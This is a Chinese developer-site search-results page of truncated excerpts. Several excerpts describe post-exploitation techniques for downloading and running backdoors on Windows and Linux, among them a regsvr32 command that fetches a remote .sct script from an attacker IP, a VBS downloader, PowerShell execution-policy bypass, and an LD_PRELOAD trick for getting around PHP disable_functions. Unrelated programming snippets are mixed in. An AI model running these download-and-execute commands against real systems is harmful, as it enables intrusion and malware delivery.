首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Windows文件下载执行的15种姿势

当我们通过Web渗透获取了一个Shell,而且目标主机是Windows,我们该怎么去下载后门文件到目标主机上执行呢? 一般来说,实现Windows文件下载执行的方式不外乎以下几种方式。...第一种,远程下载文件到本地,然后再执行;第二种,远程下载执行执行过程没有二进制文件落地,这种方式已然成为后门文件下载执行的首要方式。...在这里,本文收集了15种常见的文件下载执行的方式,并结合具体案例,让我们一起来看看是怎么实现的吧。...4、wget Windows环境下,可上传免安装的可执行程序wget.exe到目标机器,使用wget下载文件。.../s /i:http://192.168.28.131:8888/file.sct scrobj.dll 可以通过自己构造.sct文件,去下载执行我们的程序 <?

3.7K11
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Win下终端实现文件上传和下载执行

    [+] Successfully wrote (PoSh) /root/demo.cmd #powershell执行 $debug > 内容复制粘贴到cmd命令行下依次执行 -r -q 退出 或者直接执行...注意事项: Debug在Win7以上不自带了需要去官网下载DOSBox程序与debug.exe程序; WeiyiGeek. (2) FTP 描述:搭建好ftp服务器利用文本记录FTP命令进行下载常用参数...download.vbs,然后执行download.vbs即可实现下载ssss2.exe Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject...ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 powershell中的利用测试系统安装Office软件,下载执行...net版本来确定 (6) JScript 描述:相比于JSRat中用的Scripting.FileSystemObject换用ADODB.Stream实现起来更加简单高效 以下代码依次保存为js文件,直接执行即可实现下载文件

    1.9K10

    halcon下载安装:halcon怎么开始执行程序

    目录 第一部分:halcon软件介绍 第二部分:halcon怎么开始执行程序 第三部分:halcon下载安装教程题外话:人生没有彩排,每天都在现场直播。...第二部分:halcon怎么开始执行程序在HAlCON开始执行程序,有以下步骤 1.需要另起一行但不运行程序然后直接敲击回车,程序将被执行。若想在不运行程序的情况另起一行,shift+回车。 2....重置程序执行(重置变量) 程序中的变量一旦被赋值,其将一直保持该值。若想重置变量并重新执行程序,需首先通过菜单栏“执行”--“重置程序执行”来重置变量。 3....在图形显示窗口中查看鼠标处信息 按Ctrl键,同时在图形显示窗口中移动鼠标,可以显示鼠标位置以及鼠标所在处的图像灰度值第三部分:halcon下载安装教程安装教程我们以Halcon 21.11版本为例,...1、首先下载Halcon的安装包压缩文件,并解压到halcon-21.11.0.0-x64-win64文件夹。

    67920

    通过命令下载执行恶意代码的几种姿势

    在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。...在目标主机执行恶意代码,可以分为上传/下载执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载执行恶意代码的一些姿势。...一、Linux 远程恶意代码执行 01、curl 以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。...wget命令远程下载恶意程序。...regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll 06、wmic 执行WMIC以下命令从远程服务器下载并运行恶意

    2.2K20

    Android WebView通过动态的修改js去拦截post请求参数实例

    shouldInterceptRequest这个方法,我们可以通过shouldInterceptRequest和抓包工具(Fidder,Charles)去获取你想要获取信息的网址和资源文件 3.这个方法是执行在子线程的...click'); //1.将id为J_submit的按钮点击事件关闭 $('#J_submit').on('click',function(){ //2.将id为J_submit的按钮点击事件重新打开,并执行...if(TextUtils.isEmpty(remoteJs)) { return; } String js = "javascript:"; //作用:指明字符串后面的都是js代码 js...';"; js+=remoteJs; mCommonWebView.callJsFunction(js); //加载js代码 } private void runRemoteJs(String...方案B : 原生的Android方式,相对于上一种方案,这种方案比较麻烦 1.重写shouldInterceptRequest去拦截资源 2.将第三方网页上进行网络请求的js页面下载下来(就是把网页的所有下载下来

    10K31

    Python执行Linux命令、上传下载远程文件

    这里用到的Python库是Paramiko 核心知识点(亮点): 1、Python连接远程Linux服务器 2、执行命令并返回结果 3、上传文件到远程Linux服务器 4、从远程Linux下载文件 01...SFTP组件:SFTPClient,作用类似于Linux的sftp命令,用于文件上传、下载、修改文件权限等。 02 SSHClient 1、SSHClient常用方法介绍 ?...3、从Linux服务器下载文件 辰哥在Linux服务器新建了一个文本文件:Python研究者.txt ,并写入内容 ?...下载文件 localpath2 = "D:/公众号/0603/Python研究者.txt" remotepath2 = "/www/wwwroot/Python研究者.txt" # 执行下载动作 sftp.get...4、从远程Linux下载文件 为了大家方便学习,辰哥已经把本文的完整源码上传,需要的小伙伴可以去辰哥朋友圈免费领取。

    2.4K10

    挖洞经验 | 通过下载功能实现Facebook安卓应用任意代码执行

    近期,作者通过测试Facebook安卓应用APP,发现可以利用其群组的文件下载功能实现针对Facebook安卓应用的任意代码执行(ACE)。...漏洞发现 作者在测试Facebook群组文件的下载功能时发现,其有两种文件下载机制。...如果用户直接从群组帖子中下载文件,那么将通过内置名为DownloadManager的安卓服务下载,据我所知,这是一种安全的文件下载方法。...之后,我马上想到的是,能否用路径遍历的方式重写覆盖掉程序的原本库来实现代码执行。 接下来,我用Burp代理拦截了文件上传的请求包,然后把其文件名更改为 ../../...../data/data/com.facebook.katana/lib-xzs/libbreakpad.so 最终,以这种重写覆盖的方式可成功实现任意代码执行

    1.5K10

    Python Paramiko实现sftp文件上传下载以及远程执行命令

    : 上传文件: D:/text.txt 成功 三、下载文件 def sftp_down_file(host,user,password,server_path, local_path,timeout=10...):     """     下载文件,注意:不支持文件夹     :param host: 主机名     :param user: 用户名     :param password: 密码     :...t.close()         return True     except Exception as e:         print(e)         return False 测试一下,下载文件功能...    res = sftp_down_file(host, user, password, server_path, local_path)     if not res:         print("下载文件...: %s 失败"%server_path)     else:         print("下载文件: %s 成功" % server_path) 执行输出: 下载文件: /tmp/tmp.txt 成功

    9.5K20

    RCE命令执行代码执行

    使用遗漏函数 ---- rce RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。...危险等级:高 shell_exec() 功能描述:通过 Shell 执行命令,并将执行结果作为字符串返回。...> 三.利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令 php的mail函数在执行过程中会默认调用系统程序/usr/sbin/sendmail,如果我们能劫持...具体实现如下 1.编制我们自己的动态链接程序,代码如下(功能是执行mkdir test) 执行编译为一个动态共享库的命令如下 gcc -c -fPIC a.c -o a gcc -shared a -o...使用windows 系统组件com (1)phpinfo 中 com.allow_dcom 开启 什么是com 组件: COM组件是以WIN32动态链接库(DLL)或可执行文件(EXE)形式发布的可执行代码组成

    2K10

    Python - 执行顺序、执行入口

    Python 是如何执行的?执行顺序是怎么样? 至上而下,逐行执行 #!...什么是 Python 脚本的执行入口 类比:进入一栋大楼肯定有个大门入口,赛车要进入赛道也一定有一个入口 所以,执行程序,也需要一个入口 一般称代码执行的入口叫做主函数(main 函数) 执行入口(主函数...假设运行的是 xiaoming.py,那么就会执行主函数 假设运行的是 xiaohong.py,即使 xiaohong 导入了 xiaoming,也不会执行 xiaoming.py 里面的主函数(main...函数) 是否一定需要执行入口(主函数) 不一定 假设没有主函数,那么运行 xiaoming.py 时,就会至上而下,逐行运行 xiaoming.py 的所有代码 执行入口的意义 将业务代码写在主函数上面...,主函数用来调用有业务代码,代码结构整洁 向 Java、C、Golang 看齐,他们都是要求一个程序必须有一个主执行入口才能正确运行

    1.8K40

    ABAP 前台执行和后台执行

    前言 ABAP程序有2种执行方法  一个前台执行  另一个是后台运行。 后者,所谓后台执行就是在某一个时间段,程序自动运行,俗称位 JOB。...本次将讲解讨论:1.前台执行和后台执行的区别, 2.后台执行的方式,和后台debug的方法。 ---- 一、前台执行和后台执行的不同之处? 前台:通过画面来操作,称之位前台执行。...后台:不通过画面操作的处理,称之位后台执行。 总结:就是执行方式不一样,执行的内容都是一样的。(一个能看到画面,一个看不到画面)。...二、后台执行 后台执行因为不会设计到画面,所以会节省很多资源,但是在执行的之后需要给执行的程序事先事先设置好参数(variant) 1.后台执行的优势 与前台执行相比优势有2点。...1.1 规划性,后台执行可以选择 任意的时间段去执行,就行闹铃一样,只要你设定好了之后就可以定时执行

    36210
    领券